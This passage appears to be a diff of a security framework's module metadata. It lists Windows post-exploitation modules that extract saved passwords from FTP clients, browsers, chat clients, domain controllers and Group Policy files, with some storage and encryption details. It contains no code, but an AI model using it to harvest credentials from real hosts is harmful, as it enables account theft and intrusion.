null, - "actions": [] - }, - "post_windows/gather/credentials/bulletproof_ftp": { - "name": "Windows Gather BulletProof FTP Client Saved Password Extraction", - "fullname": "post/windows/gather/credentials/bulletproof_ftp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "juan vazquez " - ], - "description": "This module extracts information from BulletProof FTP Bookmarks files and store\n retrieved credentials in the database.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/bulletproof_ftp.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/bulletproof_ftp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/carotdav_ftp": { - "name": "CarotDAV credential gatherer", - "fullname": "post/windows/gather/credentials/carotdav_ftp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jacob Tierney", - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on CarotDAV FTP Client in a windows remote host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/carotdav_ftp.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/carotdav_ftp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/chrome": { - "name": "Chrome credential gatherer", - "fullname": "post/windows/gather/credentials/chrome", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Chrome in a windows remote host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/chrome.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/chrome", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/comodo": { - "name": "Comodo credential gatherer", - "fullname": "post/windows/gather/credentials/comodo", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored in Comodo on a remote Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/comodo.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/comodo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/coolnovo": { - "name": "Coolnovo credential gatherer", - "fullname": "post/windows/gather/credentials/coolnovo", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Coolnovo credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/coolnovo.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/coolnovo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/coreftp": { - "name": "Windows Gather CoreFTP Saved Password Extraction", - "fullname": "post/windows/gather/credentials/coreftp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module extracts saved passwords from the CoreFTP FTP client. These\n passwords are stored in the registry. They are encrypted with AES-128-ECB.\n This module extracts and decrypts these passwords.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/coreftp.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/coreftp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/credential_collector": { - "name": "Windows Gather Credential Collector", - "fullname": "post/windows/gather/credentials/credential_collector", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "tebo " - ], - "description": "This module harvests credentials found on the host and stores them in the database.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/credential_collector.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/credential_collector", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/digsby": { - "name": "Digsby credential gatherer", - "fullname": "post/windows/gather/credentials/digsby", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Digsby credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/digsby.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/digsby", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/domain_hashdump": { - "name": "Windows Domain Controller Hashdump", - "fullname": "post/windows/gather/credentials/domain_hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module attempts to copy the NTDS.dit database from a live Domain Controller\n and then parse out all of the User Accounts. It saves all of the captured password\n hashes, including historical ones.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/domain_hashdump.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/domain_hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/dynazip_log": { - "name": "Windows Gather DynaZIP Saved Password Extraction", - "fullname": "post/windows/gather/credentials/dynazip_log", - "aliases": [], - "rank": 300, - "disclosure_date": "2001-03-27", - "type": "post", - "author": [ - "bcoles " - ], - "description": "This module extracts clear text credentials from dynazip.log.\n The log file contains passwords used to encrypt compressed zip\n files in Microsoft Plus! 98 and Windows Me.", - "references": [ - "CVE-2001-0152", - "MSB-MS01-019", - "PACKETSTORM-24543", - "URL-https://support.microsoft.com/en-us/kb/265131" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/dynazip_log.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/dynazip_log", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/dyndns": { - "name": "Windows Gather DynDNS Client Password Extractor", - "fullname": "post/windows/gather/credentials/dyndns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Shubham Dawra ", - "sinn3r " - ], - "description": "This module extracts the username, password, and hosts for DynDNS version 4.1.8.\n This is done by downloading the config.dyndns file from the victim machine, and then\n automatically decode the password field. The original copy of the config file is also\n saved to disk.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/dyndns.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/dyndns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/enum_cred_store": { - "name": "Windows Gather Credential Store Enumeration and Decryption Module", - "fullname": "post/windows/gather/credentials/enum_cred_store", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kx499" - ], - "description": "This module will enumerate the Microsoft Credential Store and decrypt the\n credentials. This module can only access credentials created by the user the\n process is running as. It cannot decrypt Domain Network Passwords, but will\n display the username and location.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/enum_cred_store.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/enum_cred_store", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/enum_laps": { - "name": "Windows Gather Credentials Local Administrator Password Solution", - "fullname": "post/windows/gather/credentials/enum_laps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "This module will recover the LAPS (Local Administrator Password Solution) passwords,\n configured in Active Directory, which is usually only accessible by privileged users.\n Note that the local administrator account name is not stored in Active Directory,\n so it is assumed to be 'Administrator' by default.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/enum_laps.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/enum_laps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/enum_picasa_pwds": { - "name": "Windows Gather Google Picasa Password Extractor", - "fullname": "post/windows/gather/credentials/enum_picasa_pwds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Unknown", - "Sil3ntDre4m " - ], - "description": "This module extracts and decrypts the login passwords\n stored by Google Picasa.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/enum_picasa_pwds.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/enum_picasa_pwds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/epo_sql": { - "name": "Windows Gather McAfee ePO 4.6 Config SQL Credentials", - "fullname": "post/windows/gather/credentials/epo_sql", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Nathan Einwechter " - ], - "description": "This module extracts connection details and decrypts the saved password for the\n SQL database in use by a McAfee ePO 4.6 server. The passwords are stored in a\n config file. They are encrypted with AES-128-ECB and a static key.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/epo_sql.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/epo_sql", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/filezilla_server": { - "name": "Windows Gather FileZilla FTP Server Credential Collection", - "fullname": "post/windows/gather/credentials/filezilla_server", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bannedit ", - "g0tmi1k" - ], - "description": "This module will collect credentials from the FileZilla FTP server if installed.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/filezilla_server.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/filezilla_server", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/flashfxp": { - "name": "Windows Gather FlashFXP Saved Password Extraction", - "fullname": "post/windows/gather/credentials/flashfxp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It\n finds saved FTP connections in the Sites.dat file.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/flashfxp.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/flashfxp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/flock": { - "name": "Flock credential gatherer", - "fullname": "post/windows/gather/credentials/flock", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored in Flock on a remote Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/flock.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/flock", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/ftpnavigator": { - "name": "Windows Gather FTP Navigator Saved Password Extraction", - "fullname": "post/windows/gather/credentials/ftpnavigator", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/ftpnavigator.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/ftpnavigator", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/ftpx": { - "name": "Windows Gather FTP Explorer (FTPX) Credential Extraction", - "fullname": "post/windows/gather/credentials/ftpx", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bcoles " - ], - "description": "This module finds saved login credentials for the FTP Explorer (FTPx)\n FTP client for Windows.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/ftpx.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/ftpx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/gadugadu": { - "name": "Gadugadu credential gatherer", - "fullname": "post/windows/gather/credentials/gadugadu", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Gadugadu credentials on a Windows host. Gadu-Gadu is a Polish instant messaging client using a proprietary protocol. Gadu-Gadu was the most popular IM service in Poland.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/gadugadu.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/gadugadu", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/gpp": { - "name": "Windows Gather Group Policy Preference Saved Passwords", - "fullname": "post/windows/gather/credentials/gpp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell ", - "Loic Jaquemet ", - "scriptmonkey ", - "theLightCosine ", - "mubix " - ], - "description": "This module enumerates the victim machine's domain controller and\n connects to it via SMB. It then looks for Group Policy Preference XML\n files containing local user accounts and passwords and decrypts them\n using Microsofts public AES key.\n\n Cached Group Policy files may be found on end-user devices if the group\n policy object is deleted rather than unlinked.\n\n Tested on WinXP SP3 Client and Win2k8 R2 DC.", - "references": [ - "URL-http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)", - "URL-http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html", - "URL-http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx", - "URL-https://labs.portcullis.co.uk/blog/are-you-considering-using-microsoft-group-policy-preferences-think-again/", - "MSB-MS14-025" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/gpp.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/gpp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/halloy_irc": { - "name": "Halloy IRC credential gatherer", - "fullname": "post/windows/gather/credentials/halloy_irc", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jacob Tierney", - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Halloy IRC Client in a windows remote host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/halloy_irc.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/halloy_irc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/heidisql": { - "name": "Windows Gather HeidiSQL Saved Password Extraction", - "fullname": "post/windows/gather/credentials/heidisql", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h0ng10" - ], - "description": "This module extracts saved passwords from the HeidiSQL client. These\n passwords are stored in the registry. They are encrypted with a custom algorithm.\n This module extracts and decrypts these passwords.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/heidisql.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/heidisql", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/icq": { - "name": "ICQ credential gatherer", - "fullname": "post/windows/gather/credentials/icq", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for ICQ credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/icq.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/icq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/idm": { - "name": "Windows Gather Internet Download Manager (IDM) Password Extractor", - "fullname": "post/windows/gather/credentials/idm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sil3ntdre4m ", - "Unknown" - ], - "description": "This module recovers the saved premium download account passwords from\n Internet Download Manager (IDM). These passwords are stored in an encoded\n format in the registry. This module traverses through these registry entries\n and decodes them. Thanks to the template code of theLightCosine's CoreFTP\n password module.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/idm.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/idm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/ie": { - "name": "Ie credential gatherer", - "fullname": "post/windows/gather/credentials/ie", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for ie credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/ie.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/ie", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/imail": { - "name": "Windows Gather IPSwitch iMail User Data Enumeration", - "fullname": "post/windows/gather/credentials/imail", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will collect iMail user data such as the username, domain,\n full name, e-mail, and the decoded password. Please note if IMAILUSER is\n specified, the module extracts user data from all the domains found. If\n IMAILDOMAIN is specified, then it will extract all user data under that\n particular category.", - "references": [ - "EDB-11331" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/imail.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/imail", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/imvu": { - "name": "Windows Gather Credentials IMVU Game Client", - "fullname": "post/windows/gather/credentials/imvu", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Shubham Dawra " - ], - "description": "This module extracts account username & password from the IMVU game client\n and stores it as loot.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/imvu.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/imvu", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/incredimail": { - "name": "Incredimail credential gatherer", - "fullname": "post/windows/gather/credentials/incredimail", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, 